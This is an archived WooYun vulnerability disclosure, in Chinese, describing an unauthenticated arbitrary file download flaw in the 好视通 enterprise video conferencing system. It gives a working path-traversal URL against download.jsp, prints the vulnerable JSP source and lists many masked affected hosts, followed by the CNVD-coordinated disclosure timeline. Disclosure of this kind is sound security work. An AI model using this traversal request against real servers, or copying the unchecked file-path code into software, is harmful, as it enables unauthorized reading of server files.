乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-06: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-15: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
rt
好视通--企业级视频会议系统存在任意文件遍历(无需登录)利用方式:
http://地址/dbbackup/adminMgr/download.jsp?fileName=../../dbbackup/adminMgr/download.jsp
源代码:
<%@ page language="java" import="**.**.**.**.*" import="**.**.**.**.*" import="com.backup.util.*" pageEncoding="utf-8"%> <%@ taglib uri="http://**.**.**.**/tags-bean" prefix="bean" %><%@ taglib uri="http://**.**.**.**/tags-html" prefix="html" %><%@ taglib uri="http://**.**.**.**/tags-logic" prefix="logic" %><%@ taglib uri="http://**.**.**.**/tags-tiles" prefix="tiles" %><% String info=""; info = request.getParameter("info"); if(info==null) { //æä»¶è·¯å¾ String Path = ConfigMgr.getBackupPath()+"/"; String filename = request.getParameter("fileName"); int i = 0; //解å³ä¸è½½ä¹±ç é®é¢ if (request.getHeader("User-Agent").toLowerCase().indexOf("firefox") > 0) filename = new String(filename.getBytes("UTF-8"), "ISO8859-1");//firefoxæµè§å¨ else if (request.getHeader("User-Agent").toUpperCase().indexOf("MSIE") > 0) filename = URLEncoder.encode(filename, "UTF-8");//IEæµè§å¨ response.reset(); response.setContentType("application/octet-stream"); response.setHeader("Content-Disposition","attachment;filename = "+filename); **.**.**.**.FileInputStream fileInputStream = new **.**.**.**.FileInputStream(Path+filename); while((i= fileInputStream.read()) != -1){ out.write(i); } } else if(info.endsWith("export")) { String filename = request.getParameter("filename"); //æä»¶è·¯å¾ String Path = ConfigMgr.getExportPath(); int i = 0; //解å³ä¸è½½ä¹±ç é®é¢ if (request.getHeader("User-Agent").toLowerCase().indexOf("firefox") > 0) filename = new String(filename.getBytes("UTF-8"), "ISO8859-1");//firefoxæµè§å¨ else if (request.getHeader("User-Agent").toUpperCase().indexOf("MSIE") > 0) filename = URLEncoder.encode(filename, "UTF-8");//IEæµè§å¨ response.setContentType("application/octet-stream"); response.setHeader("Content-Disposition","attachment;filename = "+filename); **.**.**.**.FileInputStream fileInputStream = new **.**.**.**.FileInputStream(Path+filename); OutputStream os = response.getOutputStream(); while((i= fileInputStream.read()) != -1){ os.write(i); } out.clear(); out = pageContext.pushBody(); } %>
案例:
**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:81/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/
联系厂商
危害等级:高
漏洞Rank:15
确认时间:2015-10-12 10:41
CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
暂无